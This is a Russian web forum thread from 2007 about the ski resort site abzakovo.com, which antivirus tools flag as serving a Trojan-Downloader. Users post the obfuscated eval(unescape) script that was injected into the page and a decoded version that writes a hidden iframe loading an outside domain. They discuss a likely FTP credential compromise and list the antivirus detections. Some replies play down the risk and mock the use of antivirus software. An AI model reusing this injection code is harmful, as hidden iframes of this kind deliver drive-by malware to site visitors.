поиск:    

 
переход:  

Отдых
Отдых
Екатеринбург Онлайн
Сервисы:  Фотоальбомы  |  Новости:  Отдых  |  Публикации:  Развлечения  |  Форумы:  Клубная культура,   Отдых и путешествия,   Спортивные

  Форумы  > Спорт > Зимние виды спорта  

www.abzakovo.com - троян


Список Тем  |   Поиск  |   Правила  |   Статистика  |
www.abzakovo.com - троян   #152737  наверх
Автор: 
Дата:   

The requested URL http://www.abzakovo.com/ is infected with Trojan-Downloader.HTML.IFrame.af virus

без путнего антивиря - не лезьте
нод не чует.
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152752  наверх
Автор: Simm   (О пользователе)
Дата:   

"script"eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%36%30%31%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61% 74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%33%34%30%29%2b%27%65%66%34%64%32%37%34%5c%27%20%77%69%64%74%68%3d%32%30%20%68%65%69%67%68%74%3d%34%31%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); "/script"


если в тэге "script" вот такие "" кавычки поменять на правильные вот такие <> то будет вам в чистом виде тот вредоносный вирус а-я-я-й +)))
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152754  наверх
Автор: SD
Дата:   

почта к ним тоже не ходит
хоть телеграмму шли...
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152755  наверх
Автор: Think!   (О пользователе)
Дата:   

Ничего криминального...
Вот код скрипта.

window.status='Done';document.write('<iframe name=e601d src=\'http://x-victory.ru/forum?'+Math.round(Math.random()*8340)+'ef4d274\' width=20 height=417 style=\'display: none\'></iframe>')

Просто перход по ссылке без открытия всплывающего окна.
Страничка была заражена либо на хостинге, либо на машине разработчика.
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152759  наверх
Автор: Think!   (О пользователе)
Дата:   

Я даже могу предположить что сам разработчик сайта зарабатывает таким образом на нем...
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152764  наверх
Автор: -=Simm=-  (О пользователе)
Дата:   

да не, судя по тому что скрипт приклеен внизу страницы можно предположить что это стандартная тема выпаливания паролей у админа сайта который хранит его в какомнить тоталкомандыре =)

старый баг, который не раз обсасывался на тематических форумах.
сами так попадали
причем есть ощущение что выпаливание пароля, внедрение кода в шаблон через фтп хостинга и т.д. делается автоматом без участия людей =)
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152766  наверх
Автор: Think!   (О пользователе)
Дата:   

А ты не пробовал сходить по ссылке по которой открывается iframe?
Например по такой: http://x-victory.ru/forum?6576ef4d274
Там даже жабаскрипта нет. Максимум что можно - на стороне сервера потырить куки или sid. А на их сайте регистрация вообще не предусмотрена.
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152768  наверх
Автор: SD
Дата:   

а ламер по части скриптов, если честно
но когда при заходе на сайт антивирь пишет что скачивается вирус, меня это настораживает. причом фигурирует сайт http://takemoneysite.info/top.php

[Сообщение изменено пользователем 21.11.2007 17:47]
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152772  наверх
Автор: Think!   (О пользователе)
Дата:   


Цитата:
От пользователя: SD



Этот сайт там нигде не фигурирует в скриптах...
Как хорошо что я не пользуюсь антивирусами))) Спокойнее жить)))
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152774  наверх
Автор: SD
Дата:   

значит там не один скрипт :-)
или не скрипт :-)
мой антивирь поитогу обнаружил
указанный ранее IFrame
Trojan-Downloader.Java.OpenConnection.ao
Trojan-Downloader.JS.Agent.kd
  |  Поделиться:  
Re: www.abzakovo.com - троян   #152776  наверх
Автор: Think!   (О пользователе)
Дата:   

Там действительно два скрипта)) В первом идет переход на сайт http://golum.info/ а с него на http://putin.cc/ а потом редирект на google.ru
Там больше глюков чем я ожидал)) Но ничего особо вредоносного не нашел.
Касперскому плюсеги за то что умеет разбирать JavaScript код))
  |  Поделиться:  
Список Тем  |   Поиск  |   Правила  |   Статистика  |

Внимание! сейчас Вы не авторизованы и не можете подавать сообщения как зарегистрированный пользователь. Чтобы авторизоваться, нажмите на эту ссылку (после авторизации вы вернетесь на эту же страницу)


 Мой E1 
 
Вход для зарегистрированных пользователей:
E-mail:
Пароль:
Если Вы не зарегистрированы, то добро пожаловать на страницу регистрации.
Если Вы зарегистрированы, но забыли пароль, Вы можете его запросить.

Развернуть блок
 Погода